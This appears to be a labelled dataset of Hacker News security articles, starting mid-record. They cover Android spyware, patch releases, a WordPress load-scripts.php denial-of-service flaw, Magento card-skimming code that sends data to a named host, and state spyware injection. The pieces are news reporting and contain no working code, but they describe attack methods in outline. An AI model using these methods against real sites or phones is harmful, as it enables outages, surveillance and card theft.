Though many antivirus products for Android detect the Xhelper malware, they are yet not able to permanently remove or block it from getting itself reinstalled on the infected devices.
Since the source of the malware is still unclear, Android users are recommended to take simple but effective precautions like:
keep devices and apps up-to-date,
avoid app downloads from unfamiliar sources,
always pay close attention to the permissions requested by apps,
frequently back up data, and
install a good antivirus app that protects against this malware and similar threats.
",Malware
Android Hackers will demonstrate Fully loaded Spying Applications & Mobile Botnet,https://thehackernews.com/2012/07/android-hackers-will-demonstrate-fully.html,"This Sunday, The Capital , New Delhi plays host to an International The Hackers Conference where blackhat hackers will discuss the challenges of cyber safety with security agencies.
Your Smartphone is an always-on and always-connected digital extension of your life which will be used by attackers to covertly steal your sensitive data and spy on you. Mahesh, An Independent Security Researcher and Android Developer/Hacker will demonstrate ""Android Spy Agent"".
This application allows us to remotely access the entire victim's personal information and even though the confidential data available in the android cell phone. The type of personal information includes the victim's contacts, call logs, messages, browser's history, GPS location and much more information directly available on the victim's cell phone.
Many-a-times we think that is there any way by which we can read the private sms of anyone. So here is the solution Mr. Mahesh will present in The Hackers Conference 2012 platform with Hundreds of advance features.
This application can also allow the attacker to remotely delete the data available on the victim's phone. In order to perfectly work this application you have to gain access to the victim's android cell phone for at least 20 seconds. You have to install the application and then restart the cell phone. After restart your application gets automatically started on the victim's cell phone. Now you can access the victim's cells information for any normal cell phone and get the response on it. The android spy agent will be hidden in the victim's cell phone and not allows the victim to easily uninstall or delete it from the cell.
In Another Talk Android Hacker Aditya Gupta and Subho Halder will talk about ""All your Droids belong to me : A look into Mobile Security in 2012"". Researchers have developed and will Demonstrate malware for Android phones that can be used as a spam botnet.
""The talk is about Android Malwares, Botnets and all the crazy stuff you have been hearing in the past. We will give an inside view on how the black hat underground uses this, to earn 5-6 digit income per month . For this, We will start off by creating an Android Malware, and then will gradually move on to the Botnet Part."", Aditya Gupta said.
Maintaining that a wide variety of services are being offered on the mobile platforms without proper security implementation, Anurag Kumar Jain and Devendra Shanbhag from Tata Consultancy Services will deliberate on the topic, ""Mobile Application Security Risk and Remediation"". They will highlight the need for application security in mobile applications, the threats in a mobile environment, key security issues that can creep in mobile applications, and suggests a secure development approach which can possibly safeguard mobile applications from becoming ""sitting ducks"" for attackers and mobile malware.
Experts from countries like Iran and Argentina will share space with Indian speakers in the day-long discussion at the India Habitat Centre. Yet another important issue The Hackers Conference 2012 will deliberate on is the Internet censorship in India.
For more details, go to www.thehackersconference.com
",Malware
"Adobe Releases Critical Patches for Flash, Acrobat Reader, and Media Encoder",https://thehackernews.com/2019/05/adobe-software-updates.html,"Adobe today released its monthly software updates to patch a total of 87 security vulnerabilities in its Adobe Acrobat and Reader, Flash Player and Media Encoder, most of which could lead to arbitrary code execution attacks or worse.
None of the flaws patched this month in Adobe products has been found exploited in the wild.
Out of 87 total flaws, a whopping number of vulnerabilities (i.e., 84 in total) affect Adobe Acrobat and Reader applications alone, where 42 of them are critical and rest 42 are important in severity.
Upon successful exploitation, all critical vulnerabilities in Adobe Acrobat and Reader software lead to arbitrary code execution, allowing attackers to take complete control over targeted systems.
Adobe has released updated versions of Acrobat and Reader software for Windows and macOS operating systems to address these security vulnerabilities.
The update for Adobe Flash Player, which will receive security patch updates until the end of 2020, comes this month with a patch for just one security vulnerability( CVE-2019-7837), which is critical in severity and affects Windows, macOS, Linux, and Chrome OS versions of the software.
The third Adobe product that received patches this month is Media Encoder, a powerful tool that allows users to compress audio and/or video files to be played back across browsers and devices.
Adobe has released Media Encoder version 13.1 that addresses two security vulnerabilities, one of which is critical (CVE-2019-7842) and leads to remote code execution while the second is an information disclosure flaw.
Users of affected Adobe software for Windows, macOS, Linux, and Chrome OS are urged to update their software packages to the latest versions as soon as possible.
If your system hasn't yet detected the availability of the new update automatically, you should manually install the update by choosing ""Help → Check for Updates"" in your Adobe Acrobat and Reader software.
",Vulnerability
Warning — 5 New Trojanized Android Apps Spying On Users In Pakistan,https://thehackernews.com/2021/01/warning-5-new-trojanized-android-apps.html,"Cybersecurity researchers took the wraps off a new spyware operation targeting users in Pakistan that leverages trojanized versions of legitimate Android apps to carry out covert surveillance and espionage.
Designed to masquerade apps such as the Pakistan Citizen Portal, a Muslim prayer-clock app called Pakistan Salat Time, Mobile Packages Pakistan, Registered SIMs Checker, and TPL Insurance, the malicious variants have been found to obfuscate their operations to stealthily download a payload in the form of an Android Dalvik executable (DEX) file.
""The DEX payload contains most of the malicious features, which include the ability to covertly exfiltrate sensitive data like the user's contact list and the full contents of SMS messages,"" Sophos threat researchers Pankaj Kohli and Andrew Brandt said.
""The app then sends this information to one of a small number of command-and-control websites hosted on servers located in eastern Europe.""
Interestingly, the fake website of the Pakistan Citizen Portal was also prominently displayed in the form of a static image on the Trading Corporation of Pakistan (TCP) website, potentially in an attempt to lure unsuspecting users into downloading the malware-laced app.
Visiting the TCP website (tcp.gov.pk) now shows the message ""Down for Maintenance.""
Besides the aforementioned apps, Sophos researchers also discovered a separate app called Pakistan Chat that didn't have a benign analogue distributed via the Google Play Store. But the app was found to leverage the API of a legitimate chat service called ChatGum.
Once installed, the app requests intrusive permissions, including the ability to access contacts, file system, location, microphone, and read SMS messages, which allow it to gather a wide swathe of data on a victim's device.
All these apps have one singular purpose — to conduct covert surveillance and exfiltrate the data from a target device. In addition to sending the unique IMEI identifier, the DEX payload relays detailed profile information about the phone, location information, contact lists, the contents of text messages, call logs and the full directory listing of any internal or SD card storage on the device.
Troublingly, the malicious Pakistan Citizen Portal app also transmits sensitive information such as users' computerized national identity card (CNIC) numbers, their passport details, and the username and password for Facebook and other accounts.
""The spying and covert surveillance capability of these modified Android apps highlight the dangers of spyware to smartphone users everywhere,"" Pankaj Kohli said. ""Cyber-adversaries target mobiles not just to get their hands on sensitive and personal information, but because they offer a real-time window into people's lives, their physical location, movements, and even live conversations taking place within listening range of the infected phone.""
If anything, the development is yet another reason why users need to stick to trusted sources to download third-party apps, verify if an app is indeed built by a genuine developer, and carefully scrutinize app permissions before installation.
""In the current Android ecosystem, apps are cryptographically signed as a way to certify the code originates with a legitimate source, tying the app to its developer,"" the researchers concluded. ""However, Android doesn't do a good job exposing to the end user when a signed app's certificate isn't legitimate or doesn't validate. As such, users have no easy way of knowing if an app was indeed published by its genuine developer.""
""This allows threat actors to develop and publish fake versions of popular apps. The existence of a large number of app stores, and the freedom of users to install an app from practically anywhere makes it even harder to combat such threats.""
",Malware
Anonymous threatened Estonian government with a possible cyber attack,https://thehackernews.com/2012/10/anonymous-threatened-estonian.html,"Anonymous Hackers AnonSwedenOp posted a video on YouTube on October 8 where it threatened the Estonian government with a possible cyber attack.
""Estonian government had sacrificed its own people instead of helping its own people, Estonian government has channelled money to helping Greece that is much better off.""
""Estonia says that it doesn't have money but then they give 357 million to Greece,"" the statement declares.
Anonymous Group will most probably attack on Friday, October 12, according to video and this attack will go as Operation #OpEstonia.
The the end of the Video, Hacker with the promise: ""This must end. Estonian people, we haven't forgotten you"".
Anonymous Hacker last week took down the website of Swedish central bank also and this attack can also be on high rate, if they get possible massive number of attacks.
Subscribe to our Daily Newsletter via email - Be First to know about Security and Hackers. or Join our Huge Hackers Community on Facebook, Google+ and Twitter.
",Cyber_Attack
XSS attack on CIA (Central Itelligence Agency) Website by lionaneesh,https://thehackernews.com/2011/06/xss-attack-on-cia-central-itelligence.html,"XSS attack on CIA (Central Itelligence Agency) Website by lionaneesh
After Ddos attack on CIA (Central Itelligence Agency) website by Lulzsec, lionaneesh, an Indian hacker have found XSS Vulnerability on same site as shown. The Vulnerabile link is here . You can join Loinaneesh on Twitter.
",Vulnerability
Ethereum Classic (ETC) Hit by Double-Spend Attack Worth $1.1 Million,https://thehackernews.com/2019/01/ethereum-double-spend-attack.html,"Popular cryptocurrency exchange Coinbase has suspended all transactions of Ethereum Classic (ETC)—the original unforked version of the Ethereum network—on their trading platforms, other products and services after detecting a potential attack on the cryptocurrency network that let someone spend the same digital coins twice.
Why is this attack concerning? The heist resulted in the loss of $1.1 million worth of the Ethereum Classic digital currency. The digital currency immediately fell in price after the news came out.
Coinbase revealed Monday that it identified ""a deep chain reorganization"" of the Ethereum Classic blockchain (or 51 percent attack of the network), which means that someone controlling the majority of miners on the network (over 50%) had modified the transaction history.
After reorganizing the Ethereum blockchain, the attackers were able to what's called ""double spend"" about 219,500 ETC by recovering previously spent coins from the rightful recipients and transferring them to new entities chosen by attackers (typically a wallet in their control).
""We observed repeated deep reorganizations of the Ethereum Classic blockchain, most of which contained double spends,"" Coinbase security engineer Mark Nesbitt said in a blog post. ""The total value of the double spends that we have observed thus far is 219,500 ETC (~$1.1M).""
Coinbase identified the deep chain reorganization of the Ethereum Classic blockchain on January 5, at which point the firm halted on-chain ETC payments in order to safeguard its customer funds and the cryptocurrency exchange itself.
An update on status.coinbase.com reads: ""Due to unstable network conditions on the Ethereum Classic network, we have temporarily disabled all sends and receives for ETC. Buy and sell is not impacted. All other systems are operating normally.""
It's worth noting that this incident was not a one-time event, as the attacks are apparently ongoing.
Initially, Coinbase identified nine reorganizations containing double spends, amounted to 88,500 ETC (about $460,000), but the latest update on its blog post suggests that at least 12 additional reorganizations included double spends, totaling 219,500 ETC (nearly $1.1Million).
At the time, it is not clear whom the attackers targeted, but Coinbase reassured its customers that the cryptocurrency exchange itself had not been the target of these attacks and that no customer funds were lost.
Initially, Ethereum Classic denied the Coinbase claims, saying that the ETC network appeared to be ""operating normally,"" but hours later it confirmed the ""successful 51% attack"" on the Ethereum Classic network with ""multiple"" block reorganizations.
However, Ethereum Classic said that Coinbase did not contact ETC personnel regarding the attack and added that the investigation is an ""ongoing process.""
Since it is incredibly difficult or perhaps virtually impossible to mount such attacks against heavily-mined cryptocurrency networks like Bitcoin and Ethereum, attackers chose to target small-cap cryptocurrencies like Ethereum Classic, Litecoin Cash, Bitcoin Gold, ZenCash (now Horizen), and Verge.
Created in June 2016, Ethereum Classic is the 18th-largest cryptocurrency with a market cap of over half a billion dollars (around $539 million), which makes it an attractive target for attackers.
",Cyber_Attack
Have a D-Link Wireless Router? You might have been Hacked,https://thehackernews.com/2015/02/hacking-dlink-wireless-router.html,"The popular DSL wireless router model from D-Link are allegedly vulnerable to a software bug that could allow remote hackers to modify the DNS (Domain Name System) settings on affected routers and to hijack users' traffic.
The main goal of DNS hijacking is to secretly redirect user's traffic from a legitimate websites to a malicious one controlled by hackers. The vulnerability might also affects other devices because it is located in the same, widely-used wireless router firmware used by different manufacturers.
Bulgarian security researcher Todor Donev discovered the flaw which exists in a widely deployed ZynOS firmware from ZyXEL Communications Corporation, that is used in network hardware from TP-Link Technologies, ZTE and D-Link.
According to the security researcher, D-Link's popular DSL2740R wireless router and a number of other D-Link routers, particularly the DLS-320B, are vulnerable.
Late last year, similar router vulnerability was discovered in the web server ""RomPager"" from AllegroSoft, which is typically embedded into the firmware of routers, modems and other ""gateway devices"" from about every leading manufacturer.
The flaw put 12 million homes and offices routers from a variety of different manufacturers vulnerable to DNS hijacking attack, which also included kit from D-Link, along with Edimax, Huawei, TP-Link, ZTE, and ZyXEL.
The latest bug discovered in wireless routers running the vulnerable firmware could reveal their internal web servers to the open Internet, and according to an email from Donev, this could allow a remote attacker to configure the devices without authentication to access its administrative interface.
Donev claimed that once attackers succeeded in modifying systems' DNS settings, they could perform a handful of malicious tasks, including:
Redirecting unknown users to malicious sites – These sites could lead victim to a phishing page that could masquerade as a well-known site in order to trick users into handing out their personal and sensitive information.
Replacing advertisements on legitimate sites – Hackers could manipulate ads that users see, replacing legitimate ads with malicious ones on the sites they visit.
Controlling and redirecting network traffic – Hackers could also prevent users of infected systems from receiving important operating system updates and other software and security updates.
Pushing additional malware – Attackers could directly push malware onto the infected systems.
In order to exploit the router vulnerability, a malicious hacker would have to either be on the router's network or the wireless router would have to be publicly accessible. Now that administrative interface is exposed to the Internet, the risk of exploitation is higher.
But even if the wireless router is accessible within the local area network, hackers can still use Cross-Site Request Forgery (CSRF), a technique which involves gaining access to local networks by sending specific HTTP requests to a LAN IP address that usually associates with the wireless router.
Donev released the details of the D-Link wireless router vulnerability publicly without notifying the affected vendors. He has also published a proof-of-concept exploit for the D-Link DSL-2740R, a dual-function ADSL modem/wireless router device. As of now, this particular device has been discontinued from sale but is still supported.
",Vulnerability
Google engineers Warn Of Serious Unpatched Adobe Reader Flaws,https://thehackernews.com/2012/08/google-engineers-warn-of-serious.html,"Adobe has missed dozens of vulnerabilities in Reader in this week's Patch Tuesday run according to Google engineers who reported the flaws. Sixteen vulnerabilities still affected the Windows and Mac OS X versions, while 31 critical and ""trivially exploitable"" bugs were found in the Linux application.
Of particular concern to Google's Mateusz Jurczyk and Gynvael Coldwind are bugs in Reader for Linux, although other issues affect versions for Windows and OS X. For the Linux version, which went completely unpatched, Adobe and Google have been working together to counter 14 ""new unique crashes"" and nine ""test-cases"" that were potentially exploitable for remote code execution.
When Adobe released a new version of Reader for Windows and Mac OS X earlier this week, it patched 12 vulnerabilities, but another 16 remained unpatched. Jurczyk and Coldwind decided to come forward with information on those flaws in the interest of user safety, as Adobe has no plans to issue additional out of band updates before 27 August.
""Considering that fixing the first twenty four crashes took twelve unique code fixes, it is expected that the remaining crashes might represent around eight more unique problems. Adobe plans to fix these remaining bugs and issue an update for the Linux version of Reader in an upcoming release,"" the Google researchers said.
Adobe released new versions of Adobe Acrobat, Reader, Shockwave, and Flash to patch security holes in those products as well.
Check out the details of the Microsoft and Adobe security bulletins to figure out which ones apply to you, and prioritize the patches that are most critical or have the greatest potential to impact your PCs.
",Vulnerability
Why Protecting Your Magento Ecommerce Website Is So Damn Important,https://thehackernews.com/2015/04/Magento-website-security.html,"The Market of E-commerce websites is at its peak, as today people love to shop online to save their time. However, E-commerce and financial sites stand first in the rundown of potential victims as they manage financial exchanges.
The traditional way to target victims of e-commerce sites is to use targeted ""phishing"" attacks via social media and emails. But…
…due to increased awareness among the people about the threat of phishing attacks, hackers have now discovered new way — by malvertising legitimate websites where people assume to be safe and secure.
We know:
Today, there are many ready-to-use e-commerce platforms available on the Internet that are very easy to install and manage and that too at no extra cost; 'Magento' is one of the most popular out of them.
The most popular, the most targeted:
Yes! Security researchers at Sucuri have found a malicious code inside the Magento e-commerce website that was intended to send all the data submitted by a customer amid checkout procedure to a third-party site, here ""soulmagic .biz .fozzyhost .com/add.""
Hackers have added 50 extra lines of code in the:
app/code/core/Mage/Payment/Model/Method/Cc.php file inside the prepareSave() function, which you can see below:
What actually happens behind the scene?
Like most Magento sites, the site scanned by the researchers had a checkout form that asks for customers' credit card details.
However, Magento encrypts this information and saves it, and sends it to the payment gateway in order to complete users' transaction.
But, at the moment between the checkout form submission and encryption of the user's payment details when Magento handles customer's sensitive information in a plain text, the code injected by hackers send this unencrypted data to third-party address.
Not only Magento sites are targeted:
Researchers also found a very similar code being injected by hackers into the Joomla Donation extension in Joomla websites in order to send customers' credit card information to the hackers using ""java-e-shop .com/add.""
Moreover, all e-commerce solutions, including CMS, plugin, and extension, are equally susceptible to this kind of cyber attack in the event they request customers' credit card details directly on a site, instead of redirecting them to a payment gateway.
Because:
It's so easy for a hacker to add a few lines of malicious code in the legitimate code of the website in an effort to dump customer's sensitive details to a noxious third-party.
However, customers of online store aren't the only target, either:
""When hackers manage to compromise an e-commerce site, the owners of the website can be robbed too,"" researchers at Sucuri wrote.
There are a known number of cases where hackers replace the PayPal account of website owner with their own account. As a result, every time a customer buys something, the site owner would ""never receive the funds.""
The bottom line:
Online Shoppers can protect themselves against this threat by following these steps:
Don't enter your payment details on the websites that offer their own page. Instead prefer the sites that redirect you to a payment gateway provided by PayPal, payment gateway or bank to complete the transaction.
Only use your Credit Cards with additional levels of authentication. Use payment cards that support additional security layers, like Visa 3-D Secure, or MasterCard SecureCode, or your bank's own 2FA service.
Check the website for any security issue. This can be done by either surfing the Internet or simply check Google's SafeBrowsing information for the website using this link: https://www.google.com/safebrowsing/diagnostic?site=example.com, where example.com is the domain name of the site you want to check.
Owners of E-commerce website can protect themselves against this threat by following these steps:
Don't allow customers to process payment details on your site. Outsource the payments to trusted third-party service such as PayPal, Stripe or Google Wallet, so that if hackers compromise your site they cannot be able to steal your customers' credit card details.
Use best practices with your website security, including strong and unique passwords for every element of your site, actively maintain and update your website firewall, and monitor your website for security issues.
Be Proactive. If your website is hacked, get help immediately as you cannot put both your customers' money as well as your reputation at risk.
",Malware
Unpatched DoS Flaw Could Help Anyone Take Down WordPress Websites,https://thehackernews.com/2018/02/wordpress-dos-exploit.html,"A simple yet serious application-level denial of service (DoS) vulnerability has been discovered in WordPress CMS platform that could allow anyone to take down most WordPress websites even with a single machine—without hitting with a massive amount of bandwidth, as required in network-level DDoS attacks to achieve the same.
Since the company has denied patching the issue, the vulnerability (CVE-2018-6389) remains unpatched and affects almost all versions of WordPress released in last nine years, including the latest stable release of WordPress (Version 4.9.2).
Discovered by Israeli security researcher Barak Tawily, the vulnerability resides in the way ""load-scripts.php,"" a built-in script in WordPress CMS, processes user-defined requests.
For those unaware, load-scripts.php file has only been designed for admin users to help a website improve performance and load page faster by combining (on the server end) multiple JavaScript files into a single request.
However, to make ""load-scripts.php"" work on the admin login page (wp-login.php) before login, WordPress authors did not keep any authentication in place, eventually making the feature accessible to anyone.
Depending upon the plugins and modules you have installed, the load-scripts.php file selectively calls required JavaScript files by passing their names into the ""load"" parameter, separated by a comma, like in the following URL:
https://your-wordpress-site.com/wp-admin/load-scripts.php?c=1&load=editor,common,user-profile,media-widgets,media-gallery
While loading the website, the 'load-scripts.php' (mentioned in the head of the page) tries to find each JavaScript file name given in the URL, append their content into a single file and then send back it to the user's web browser.
How WordPress DoS Attack Works
According to the researcher, one can simply force load-scripts.php to call all possible JavaScript files (i.e., 181 scripts) in one go by passing their names into the above URL, making the targeted website slightly slow by consuming high CPU and server memory.
""There is a well-defined list ($wp_scripts), that can be requested by users as part of the load[] parameter. If the requested value exists, the server will perform an I/O read action for a well-defined path associated with the supplied value from the user,"" Tawily says.
Although a single request would not be enough to take down the whole website for its visitors, Tawily used a proof-of-concept (PoC) python script, doser.py, which makes large numbers of concurrent requests to the same URL in an attempt to use up as much of the target servers CPU resources as possible and bring it down.
The Hacker News has verified the authenticity of the DoS exploit that successfully took down one of our demo WordPress websites running on a medium-sized VPS server.
""It is time to mention again that load-scripts.php does not require any authentication, an anonymous user can do so. After ~500 requests, the server didn't respond at all any more, or returned 502/503/504 status code errors,"" Tawily says.
However, attack from a single machine, with some 40 Mbps connection, was not enough to take down another demo website running on a dedicated server with high processing power and memory.
But that doesn't mean the flaw is not effective against WordPress websites running over a heavy-server, as application-level attack generally requires a lot fewer packets and bandwidth to achieve the same goal—to take down a site.
So attackers with more bandwidth or a few bots can exploit this flaw to target big and popular WordPress websites as well.
No Patch Available – Mitigation Guide
Along with the full disclosure, Tawily has also provided a video demonstration for the WordPress Denial of Service attack. You can watch the video to see the attack in action.
Knowing that DoS vulnerabilities are out-of-scope from the WordPress bug bounty program, Tawily responsibly reported this DoS vulnerability to the WordPress team through HackerOne platform.
However, the company refused to acknowledge the issue, saying that this kind of bug ""should really get mitigated at the server end or network level rather than the application level,"" which is outside of WordPress's control.
The vulnerability seems to be serious because WordPress powers nearly 29 percent of the Web, placing millions of websites vulnerable to hackers and making them unavailable for their legitimate users.
For websites that can't afford services offering DDoS protection against application-layer attacks, the researcher has provided a forked version of WordPress, which includes mitigation against this vulnerability.
However, I personally wouldn't recommend users to install modified CMS, even if it is from a trusted source other than the original author.
Besides this, the researcher has also released a simple bash script that fixes the issue, in case you have already installed WordPress.
",Vulnerability
iScanner - Tool to detect and remove malicious codes and web page,https://thehackernews.com/2011/09/iscanner-tool-to-detect-and-remove.html,"iScanner - Tool to detect and remove malicious codes and web page
iScanner is a free open source tool lets you detect and remove malicious codes and web page malwares from your website easily and automatically. iScanner will not only show you the infected files in your server but it's also able to clean these files by removing the malware code ONLY from the infected files.
Current Features:
Ability to scan one file, directory or remote web page / website.
Detect and remove website malwares and malicious code in web pages. This include hidden iframe tags, javascript, vbscript, activex objects, suspicious PHP codes and some known malwares.
Extensive log shows the infected files and the malicious code.
Support for sending email reports.
Ability to clean the infected web pages automatically.
Easy backup and restore system for the infected files.
Simple and editable signature based database.
You can easily send malicious file to iScanner developers for analyzes.
Ability to update the database and the program easily from iScanner's server.
Very flexible options and easy to use.
Fast scanner with great performance.
Yes, it's FREE!!
Download iScanner
",Malware
Gazer: A New Backdoor Targets Ministries and Embassies Worldwide,https://thehackernews.com/2017/08/gazer-backdoor-malware.html,"Security researchers at ESET have discovered a new malware campaign targeting consulates, ministries and embassies worldwide to spy on governments and diplomats.
Active since 2016, the malware campaign is leveraging a new backdoor, dubbed Gazer, and is believed to be carried out by Turla advanced persistent threat (APT) hacking group that's been previously linked to Russian intelligence.
Gazer, written in C++, the backdoor delivers via spear phishing emails and hijacks targeted computers in two steps—first, the malware drops Skipper backdoor, which has previously been linked to Turla and then installs Gazer components.
In previous cyber espionage campaigns, the Turla hacking group used Carbon and Kazuar backdoors as its second-stage malware, which also has many similarities with Gazer, according to research [PDF] published by ESET.
Gazer receives encrypted commands from a remote command-and-control server and evades detection by using compromised, legitimate websites (that mostly use the WordPress CMS) as a proxy.
Instead of using Windows Crypto API, Gazer uses custom 3DES and RSA encryption libraries to encrypt the data before sending it to the C&C server—a common tactic employed by the Turla APT group.
Gazer uses code-injection technique to take control of a machine and hide itself for a long period of time in an attempt to steal information.
Gazer backdoor also has the ability to forward commands received by one infected endpoint to the other infected machines on the same network.
So far ESET researchers have identified four different variants of the Gazer malware in the wild, primarily spying on Southeast European and former Soviet bloc political targets.
Interestingly, earlier versions of Gazer were signed with a valid certificate issued by Comodo for ""Solid Loop Ltd,"" while the latest version is signed with an SSL certificate issued to ""Ultimate Computer Support Ltd.""
According to researchers, Gazer has already managed to infect a number of targets worldwide, with the most victims being located in Europe.
Meanwhile, Kaspersky lab has also published almost similar details about Gazer backdoor, but they called it 'Whitebear' APT campaign.
",Cyber_Attack
"Android Adware abusing permissions, Collecting more than they need",https://thehackernews.com/2012/10/android-adware-abusing-permissions.html,"So you just bought a new Android-based smartphone, what comes next? What else but the most exciting part downloading the right apps to boost its functionality. Android gives you the freedom to personalize your device, which has made it attractive to those who want their smartphones to be as unique as possible
""Many apps will ask you to grant them network access so they can download updates. Others seek permission to read your phone's state and identity so calls won't disrupt them from doing what they're doing. Unfortunately, these permissions can be abused for criminal intentions."" Trendmicro said in report.
Before android applications was abusing permissions to access user's personal data, but now new generations of adware targeting Android smartphones are increasingly violating user privacy by grabbing personal information and using it without permission.
Adware is software that is used to gather information about the users. This information is sent to advertising agencies who are the people who planted the adware in the first place. Adware displays an advertisement in the form of pop ups or text messages. When you click on the advertisement, you will be redirected to a browser that will open the link to the advertisers' site. When you visit the site, your data will be logged into the advertisers' server. We have no way of ensuring that adware is within its legal limitations while collecting data about you. The procedure is very simple.
Although most adware is designed to collect some user information, the line between legitimate data gathering and violating privacy is starting to blur. The process becomes a privacy issue when app developers take more information than they originally asked for and then sell it to ad networks.
Here is a list of the data leaked from the Android device and sent to the servers of the company behind this module:
The device's IP address on all interfaces (i.e., both WiFi and mobile network)
The device's ANDROID_ID (unique 64-bit identifier for the device)
The Android OS version
The user's location, as determined by GPS
The user's mobile network and their country code
The user's phone number
The device's unique ID (their IMEI, MEID, or ESN)
The device's manufacturer and version
Based on information from MARS and Google Play, at least 7,000 free apps use this particular advertising module. 80% of them are still available, and at least 10% of them have been downloaded more than one million times.
In addition to taking the user's personal information, these ads also display advertising in particularly annoying ways. Either notifications or an icon on the device's home screen are used to serve ads to users. Users should be careful about all mobile apps they download, wherever they come from.
",Malware
ISPs Caught Injecting Cryptocurrency Miners and Spyware In Some Countries,https://thehackernews.com/2018/03/cryptocurrency-spyware-malware.html,"Governments in Turkey and Syria have been caught hijacking local internet users' connections to secretly inject surveillance malware, while the same mass interception technology has been found secretly injecting browser-based cryptocurrency mining scripts into users' web traffic in Egypt.
Governments, or agencies linked to it, and ISPs in the three countries are using Deep Packet Inspection technology from Sandvine (which merged with Procera Networks last year), to intercept and alter Internet users' web traffic.
Deep packet inspection technology allows ISPs to prioritize, degrade, block, inject, and log various types of Internet traffic, in other words, they can analyze each packet in order to see what you are doing online.
According to a new report by Citizen Lab, Turkey's Telecom network was using Sandvine PacketLogic devices to redirect hundreds of targeted users (journalists, lawyers, and human rights defenders) to malicious versions of legitimate programs bundled with FinFisher and StrongPity spyware, when they tried to download them from official sources.
""This redirection was possible because official websites for these programs, even though they might have supported HTTPS, directed users to non-HTTPS downloads by default,"" the report reads.
A similar campaign has been spotted in Syria, where Internet users were silently redirected to malicious versions of the various popular application, including Avast Antivirus, CCleaner, Opera, and 7-Zip applications bundled with government spyware.
In Turkey, Sandvine PacketLogic devices were being used to block websites like Wikipedia, the sites of the Dutch Broadcast Foundation (NOS) and Kurdistan Workers' Party (PKK).
ISPs Injected Cryptocurrency Mining Scripts Into Users' Web Browsers
However, in Egypt, Sandvine PacketLogic devices were being used by a Telecom operator for making money by:
Secretly injecting a cryptocurrency mining script into every HTTP web page users visited in order to mine the Monero cryptocurrency,
Redirecting Egyptian users to web pages with affiliate ads.
In Egypt, these devices were also being used to block access to human rights, political, and news outlets like Al Jazeera, HuffPost Arabic, Reporters Without Borders, and Mada Masr, as well as NGOs like Human Rights Watch.
Citizen Lab researchers reported Sandvine of their findings, but the company called their report ""false, misleading, and wrong,"" and also demanded them to return the second-hand PacketLogic device they used to confirm attribution of their fingerprint.
Citizen Lab started this investigation in September last year after ESET researchers published a report revealing that the downloads of several popular apps were reportedly compromised at the ISP level in two (unnamed) countries to distribute the FinFisher spyware.
",Cyber_Attack
Microsoft to Issue 16 Security Patches and 60 Other Updates,https://thehackernews.com/2014/11/microsoft-to-issue-16-security-patches_9.html,"Microsoft has this time quite a big pile of security patches in its November 2014 Patch Tuesday, which will address almost 60 non-security updates for its Windows OS along with 16 security updates.
The software giant released Advance Notification for 16 security bulletins, the most in more than three years, which will be addressed as of tomorrow, 11 November, 2014. Five of the bulletins have been marked as ""critical"", nine are ""important"" in severity, while two were labeled ""moderate.""
The updates will patch vulnerabilities in Microsoft's various software including Internet Explorer (IE), Windows, Office, Exchange Server, SharePoint Server and the .NET framework as well.
Five critical vulnerabilities affect specific versions of Microsoft Windows, including Windows 7, Windows 8, Windows RT, and Windows Server. One of them also affects Internet Explorer versions 7 through 11 as well.
Four of the five critical bugs are said to allow remote code execution, meaning that successful hackers could hijack a system and install malicious softwares on the victim's machine, while the last could allow an attacker to gain administrative privilege on a vulnerable machine.
""A vulnerability whose exploitation could allow code execution without user interaction. These scenarios include self-propagating malware (e.g. network worms), or unavoidable common use scenarios where code execution occurs without warnings or prompts. This could mean browsing to a web page or opening email,"" is how Microsoft describes a critical patch.
Another nine patches are rated as ""important"", which are not as severe as the critical ones but should still be installed in order to keep your systems safe. These affect Microsoft Windows, Office and Microsoft Exchange.
Five of the nine important updates will patch ""elevation of privilege"" vulnerabilities, two others fix the OS security features bypass vulnerabilities, one addresses Remote Code Execution bug, while the other one plugs an information leak.
Last two patches are rated as ""moderate"", which indicates a much lower risk, but should still be installed by the users. One of them addresses a denial of service flaw in Microsoft Windows, while the other patches an Elevation of Privilege bug.
If you have Automatic Updates enabled on your machine, these fixes will all be made available via Windows Update and will be applied automatically for most users. But in case users have not enabled it, Microsoft is encouraging them to apply the updates promptly. Some patches applied may require restarting the servers as well.
",Vulnerability
"Hackers breach Twitter and 250,000 accounts compromised",https://thehackernews.com/2013/02/hackers-breach-twitter-and-250000.html,"In recent The Hacker News updates, we have reported about some major hacking events and critical vulnerabilities i.e Cyber attack and spying on The New York Times and Wall Street Journal by Chinese Hackers, Security Flaws in UPnP protocol, Botnet attack hack 16,000 Facebook accounts, 700,000 accounts hacked in Africa and new android malware that infect more that 620,000 users.
Today Twitter also announced that they have recorded some unusual access patterns that is identified as unauthorized access attempts to Twitter user data. Unknown hackers breach Twitter this week and may have gained access to passwords and other information for as many as 250,000 user accounts
""the attackers may have had access to limited user information – usernames, email addresses, session tokens and encrypted/salted versions of passwords"" said Bob Lord ,Director of Information Security, at Twitter.
For security reasons twitter have reset passwords and revoked session tokens for these suspected compromised accounts. ""This attack was not the work of amateurs and we do not believe it was an isolated incident,"" he added.
""The attackers were extremely sophisticated and we believe other companies and organisations have also been recently similarly attacked.""
Twitter have not mention that how hackers were able to infiltrate Twitter's systems, but Twitter's blog post alluded that hackers had broken in through a zero day vulnerability in Oracle's Java software.
Some media portals also relate this attack to Hacktivist Anonymous Group incorrectly, because twitter itself no where mention anything about who is attacker! If you are not using good password hygiene, take a moment now to change your Twitter passwords.
",Cyber_Attack
Critical Print Spooler Bug allows Attackers to Hack any version of Microsoft Windows,https://thehackernews.com/2016/07/printer-security-update.html,"Microsoft's July Patch Tuesday offers 11 security bulletins with six rated critical resolving almost 50 security holes in its software.
The company has patched a security flaw in the Windows Print Spooler service that affects all supported versions of Windows ever released, which if exploited could allow an attacker to take over a device via a simple mechanism.
The ""critical"" flaw (CVE-2016-3238) actually resides in the way Windows handles printer driver installations as well as the way end users connect to printers.
The flaw could allow an attacker to install malware remotely on victim machine that can be used to view, modify or delete data, or create new accounts with full user rights; Microsoft said in MS16-087 bulletin posted Tuesday.
Users who are logged in with fewer user rights on the system are less impacted than users who operate with administrative user rights, such as some home accounts and server users.
Microsoft said the critical flaw could be exploited to allow remote code execution if an attacker can conduct a man-in-the-middle (MiTM) attack on a system or print server or set up a rogue print server on a target network.
The critical flaw was discovered and reported by the researchers at security firm Vectra Networks, who disclosed some details on the vulnerability, but didn't publish their proof-of-concept (POC) code.
You can watch the video that shows the hack in action:
In corporate networks, by default network administrators allow printers to deliver the necessary drivers to workstations or systems connected to the network. These drivers are silently installed without user interaction and run with full privileges under the SYSTEM user.
